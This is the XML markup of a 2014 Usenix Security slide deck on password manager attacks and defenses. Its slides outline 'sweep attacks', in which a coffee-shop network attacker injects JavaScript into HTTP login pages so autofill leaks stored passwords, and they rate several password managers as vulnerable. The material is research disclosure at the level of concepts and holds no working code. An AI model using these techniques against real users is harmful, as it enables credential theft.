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32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203786"/>
          <c:y val="0.071714"/>
          <c:w val="0.978964"/>
          <c:h val="0.81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Security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Manual Entry</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Manual Autofill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2.0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46480520"/>
        <c:axId val="2046360712"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="2046480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500" b="1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2046360712"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="1"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2046360712"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="3.0"/>
          <c:min val="0.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2046480520"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
        <c:majorUnit val="1.0"/>
        <c:minorUnit val="0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c:style val="18"/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203786"/>
          <c:y val="0.071714"/>
          <c:w val="0.978964"/>
          <c:h val="0.81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Security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Manual Entry</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Secure Filling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2.0</c:v>
                </c:pt>
                <c:pt idx="1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2045244968"/>
        <c:axId val="2045041800"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="2045244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500" b="1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2045041800"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="1"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2045041800"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="3.0"/>
          <c:min val="0.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2045244968"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
        <c:majorUnit val="1.0"/>
        <c:minorUnit val="0.5"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln w="12700" cap="flat">
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:prstDash val="solid"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586058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871463"/>
            <a:ext cx="11099800" cy="1305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6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6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6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6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6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6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6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6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6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9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youtu.be/n0xIiWl0pZo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youtu.be/qiiSuIE79No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19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Password Managers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6000"/>
              <a:t>Attacks and Defenses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270000" y="5621866"/>
            <a:ext cx="10464800" cy="3302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500" b="1"/>
              <a:t>David Silver		</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3500"/>
              <a:t>Suman Jana		Dan Boneh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2900" i="1"/>
              <a:t>Stanford University</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="3200" i="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3500"/>
              <a:t>	Eric Chen		Collin Jackson </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2900" i="1"/>
              <a:t>Carnegie Mellon University</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Shape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9754446" y="8970433"/>
            <a:ext cx="31140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Usenix Security 2014</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285326" y="8970433"/>
            <a:ext cx="11734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8/21/14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Should we autofill?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="461518">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4740"/>
              <a:t>Click through HTTPS warning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6381681" y="92392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10</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15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9289" y="7267280"/>
            <a:ext cx="774092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44181" y="7296939"/>
            <a:ext cx="714634" cy="71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aosp-icon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9462" y="7272684"/>
            <a:ext cx="763283" cy="76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18635" y="7297088"/>
            <a:ext cx="714475" cy="7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613595" y="7297088"/>
            <a:ext cx="774091" cy="7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creen Shot 2014-08-13 at 9.01.28 AM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45000" y="2193077"/>
            <a:ext cx="10745007" cy="3828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4536236" y="6355939"/>
            <a:ext cx="41864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Automatic Autofill:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Shape 165"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2796182" y="4724077"/>
            <a:ext cx="1263403" cy="407046"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="C82506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59" grpId="5" animBg="1" advAuto="0"/>
      <p:bldP spid="160" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="161" grpId="6" animBg="1" advAuto="0"/>
      <p:bldP spid="162" grpId="7" animBg="1" advAuto="0"/>
      <p:bldP spid="164" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="165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Should we autofill?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="461518">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4740"/>
              <a:t>iFrame not same-origin with parent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xfrm>
            <a:off x="6381681" y="92392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11</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16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354" y="7267280"/>
            <a:ext cx="774092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1092" y="7296939"/>
            <a:ext cx="714634" cy="71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8935" y="7297088"/>
            <a:ext cx="714475" cy="7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4536236" y="6355939"/>
            <a:ext cx="41864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Automatic Autofill:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="173" name="Screen Shot 2014-08-13 at 9.34.09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54616" y="2348538"/>
            <a:ext cx="3949701" cy="3517901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="080101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2" animBg="1" advAuto="0"/>
      <p:bldP spid="170" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="171" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="171" grpId="5" animBg="1" advAuto="0"/>
      <p:bldP spid="17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12</a:t>
            </a:fld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066800" y="3709156"/>
            <a:ext cx="11099800" cy="130507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6000" b="1"/>
              <a:t>Sweep Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Shape 177"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1266316" y="5175250"/>
            <a:ext cx="107007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Stealing multiple passwords without user interaction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338370" y="3972548"/>
            <a:ext cx="5545387" cy="3202679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5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5400"/>
              <a:t>Threat Model: Coffee-shop Attacker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52301" y="2469182"/>
            <a:ext cx="4955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1.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Shape 183"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6828163" y="2469182"/>
            <a:ext cx="4955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2.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Shape 184"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6502399" y="2686595"/>
            <a:ext cx="1" cy="4569174"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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2606586" y="5901888"/>
            <a:ext cx="320913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200" b="1"/>
              <a:t>Save Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" b="1"/>
              <a:t>for b.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="186" name="pasted-imag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1213" y="2346090"/>
            <a:ext cx="1264971" cy="1117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11949855741697952186small_house_01.svg.m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8541" y="2118434"/>
            <a:ext cx="1525045" cy="1572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857" y="5027529"/>
            <a:ext cx="1942063" cy="181259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 flipV="1">
            <a:off x="2306383" y="5261774"/>
            <a:ext cx="1609361" cy="624227"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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90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19605" y="4098590"/>
            <a:ext cx="647701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inksys-Wireless-G-Router-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44646" y="3919237"/>
            <a:ext cx="2114617" cy="181252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6984141" y="4011276"/>
            <a:ext cx="5545387" cy="3202679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3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23628" y="5066257"/>
            <a:ext cx="1942064" cy="181259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 flipV="1">
            <a:off x="8952154" y="5300501"/>
            <a:ext cx="1609362" cy="624228"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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95" name="Linksys-Wireless-G-Router-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90417" y="3933820"/>
            <a:ext cx="2114617" cy="1812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jTx6nAeT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279695" y="4175418"/>
            <a:ext cx="745913" cy="6477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667704" y="7656958"/>
            <a:ext cx="1135165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Goal: Trick password manager into revealing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t> b.com’s password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Shape 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9354850" y="6181916"/>
            <a:ext cx="286980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 b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" b="1"/>
              <a:t>Browse a.com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1" animBg="1" advAuto="0"/>
      <p:bldP spid="184" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="186" grpId="5" animBg="1" advAuto="0"/>
      <p:bldP spid="192" grpId="7" animBg="1" advAuto="0"/>
      <p:bldP spid="193" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="194" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="195" grpId="6" animBg="1" advAuto="0"/>
      <p:bldP spid="196" grpId="8" animBg="1" advAuto="0"/>
      <p:bldP spid="197" grpId="10" animBg="1" advAuto="0"/>
      <p:bldP spid="198" grpId="9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848268" y="871463"/>
            <a:ext cx="11099801" cy="130507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Obligatory Food Example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14</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="202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4151" y="3094476"/>
            <a:ext cx="2168628" cy="1915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9518" y="3094476"/>
            <a:ext cx="3797301" cy="21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paJohnsPizza_log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34458" y="3420109"/>
            <a:ext cx="3499954" cy="1482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AT&amp;T_logo_200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73932" y="6146015"/>
            <a:ext cx="4256936" cy="191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  <p:bldP spid="203" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="204" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="205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0136743" y="1544988"/>
            <a:ext cx="2032001" cy="813017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5499100" y="1544988"/>
            <a:ext cx="2032000" cy="8147621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581349" y="1544988"/>
            <a:ext cx="2032001" cy="8130178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948032" y="692010"/>
            <a:ext cx="11099801" cy="632310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="344677">
              <a:defRPr sz="3539" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3539" b="1"/>
              <a:t>Redirect Sweep Attack on HTTP Login Page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15</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="214" name="Group 214"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5741106" y="1583985"/>
            <a:ext cx="1522587" cy="1305075"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1522586" cy="1305073"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="212" name="Linksys-Wireless-G-Router-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522587" cy="1305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jTx6nAeTE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2214" y="137380"/>
              <a:ext cx="537079" cy="466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5" name="soulmates_lapto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1270" y="1557009"/>
            <a:ext cx="1712159" cy="135902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463425" y="3356714"/>
            <a:ext cx="5118436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2601566" y="2887820"/>
            <a:ext cx="29093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GET papajohns.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Shape 218"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1463425" y="4078692"/>
            <a:ext cx="5118436" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="B71D16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2637756" y="3622615"/>
            <a:ext cx="28369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B71D1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71D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>REDIRECT att.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Shape 220"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463425" y="4981975"/>
            <a:ext cx="9696747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3152035" y="4518967"/>
            <a:ext cx="180838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GET att.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Shape 222"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460179" y="5788501"/>
            <a:ext cx="5118435" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="B71D16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8226150" y="5322233"/>
            <a:ext cx="121554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 att.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Shape 224"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463426" y="8437774"/>
            <a:ext cx="9696745" cy="1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2560789" y="7926480"/>
            <a:ext cx="2909317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GET papajohns.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Shape 226"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460179" y="9084128"/>
            <a:ext cx="9703240" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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7673916" y="8570972"/>
            <a:ext cx="2320012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500"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>papajohns.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Shape 228"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6497932" y="5788501"/>
            <a:ext cx="4665486" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill/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2604174" y="5322463"/>
            <a:ext cx="283693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B71D1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71D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+ attacker JS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="230" name="jTx6nAe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39429" y="5476140"/>
            <a:ext cx="719449" cy="624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jTx6nAe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4476" y="3436044"/>
            <a:ext cx="719449" cy="62472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811727" y="6003666"/>
            <a:ext cx="157124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/>
              <a:t>automatic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>autofill</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Shape 233"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493305" y="6833065"/>
            <a:ext cx="220808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B71D1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71D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>att.com password stolen!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="234" name="jTx6nAeT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4008" y="6606230"/>
            <a:ext cx="719450" cy="624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clou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96664" y="1783992"/>
            <a:ext cx="1712159" cy="905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animBg="1" advAuto="0"/>
      <p:bldP spid="217" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="218" grpId="5" animBg="1" advAuto="0"/>
      <p:bldP spid="219" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="220" grpId="7" animBg="1" advAuto="0"/>
      <p:bldP spid="221" grpId="6" animBg="1" advAuto="0"/>
      <p:bldP spid="222" grpId="12" animBg="1" advAuto="0"/>
      <p:bldP spid="223" grpId="8" animBg="1" advAuto="0"/>
      <p:bldP spid="224" grpId="17" animBg="1" advAuto="0"/>
      <p:bldP spid="225" grpId="16" animBg="1" advAuto="0"/>
      <p:bldP spid="226" grpId="19" animBg="1" advAuto="0"/>
      <p:bldP spid="227" grpId="18" animBg="1" advAuto="0"/>
      <p:bldP spid="228" grpId="9" animBg="1" advAuto="0"/>
      <p:bldP spid="229" grpId="11" animBg="1" advAuto="0"/>
      <p:bldP spid="230" grpId="10" animBg="1" advAuto="0"/>
      <p:bldP spid="231" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="232" grpId="13" animBg="1" advAuto="0"/>
      <p:bldP spid="233" grpId="15" animBg="1" advAuto="0"/>
      <p:bldP spid="234" grpId="1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550164" y="146050"/>
            <a:ext cx="77958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Redirect Sweep Attack Demo (Fast)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Shape 239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3637356" y="4552950"/>
            <a:ext cx="57300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/>
              </a:rPr>
              <a:t>http://youtu.be/n0xIiWl0pZo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2486763" y="146050"/>
            <a:ext cx="79226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Redirect Sweep Attack Demo (Slow)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Shape 243"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3650157" y="4699000"/>
            <a:ext cx="570448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/>
              </a:rPr>
              <a:t>http://youtu.be/qiiSuIE79No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HTTP Login Pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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18</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="247" name="Table 247"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1905376" y="2692466"/>
          <a:ext cx="9194046" cy="270645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6346926"/>
                <a:gridCol w="1366723"/>
                <a:gridCol w="1480397"/>
              </a:tblGrid>
              <a:tr h="786738">
                <a:tc gridSpan="3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Alexa Top 500*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9858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Login Pages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408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59858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Load Login Page over HTTP (submit over HTTP or HTTPS)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194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47%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48" name="Shape 248"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9763421" y="8824383"/>
            <a:ext cx="28590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*as of October 2013</a:t>
            </a:r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952500" y="6198468"/>
            <a:ext cx="11099800" cy="2260287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="324485" lvl="0" indent="-324485" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2628"/>
              <a:t>HTTP pages trivially vulnerable to code injection by coffee shop attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="324485" lvl="0" indent="-324485" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2628"/>
              <a:t>att.com vulnerable because it loads login page over HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="648970" lvl="1" indent="-324485" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2628"/>
              <a:t>(even though it submits over HTTPS)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Attacking HTTPS</a:t>
            </a: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26463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3000"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>XSS Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Active Mixed Content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Trick user into clicking through HTTPS warning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Shape 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A tool for…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</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Shape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638911" y="4000500"/>
            <a:ext cx="433557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Convenience?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8516467" y="4000500"/>
            <a:ext cx="282986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Security?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Shape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4647852" y="5646663"/>
            <a:ext cx="370909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 b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5200" b="1"/>
              <a:t>Goal: Both!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952500" y="579363"/>
            <a:ext cx="11099800" cy="1091357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Other sweep attacks (see paper)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20</a:t>
            </a:fld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xfrm>
            <a:off x="952500" y="2344919"/>
            <a:ext cx="11099800" cy="299053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iFrame sweep attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Window sweep attack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520699" y="6503913"/>
            <a:ext cx="7096150" cy="152097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520700" y="3477189"/>
            <a:ext cx="11963400" cy="152097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Sweep Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="461518">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4740"/>
              <a:t>Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Shape 262"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669422" y="3856981"/>
            <a:ext cx="2739133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r">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" b="1"/>
              <a:t>Automatic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="r">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="4000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="r">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="4000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="r">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="4000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="r">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="4000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="r">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" b="1"/>
              <a:t>Manual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="r">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="4000" b="1"/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6381681" y="92392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21</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="264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5480" y="3850631"/>
            <a:ext cx="774091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87684" y="6907014"/>
            <a:ext cx="714772" cy="714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38549" y="6877354"/>
            <a:ext cx="774091" cy="77409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3878035" y="2647949"/>
            <a:ext cx="295086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b="1">
                <a:solidFill>
                  <a:srgbClr val="C825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C82506"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="268" name="google-chrome-logo-transparent-backgroun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676092" y="3844994"/>
            <a:ext cx="785364" cy="78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lastpass_large_logo_05061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116714" y="3839463"/>
            <a:ext cx="796427" cy="79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firefox-51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959424" y="3839463"/>
            <a:ext cx="796427" cy="79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aosp-icon-transparent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95361" y="3839463"/>
            <a:ext cx="796427" cy="79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nternet_Explorer_7_Logo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517539" y="3861799"/>
            <a:ext cx="774092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1Password-4-Logo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861074" y="6877354"/>
            <a:ext cx="774091" cy="7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norton_identity_safe_200x175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375812" y="3899012"/>
            <a:ext cx="774092" cy="67733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hape 275"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3426526" y="5565238"/>
            <a:ext cx="40370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b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5D1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0B5D18"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not Vulnerable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952500" y="4224263"/>
            <a:ext cx="11099800" cy="1305074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="560831">
              <a:defRPr sz="5760"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
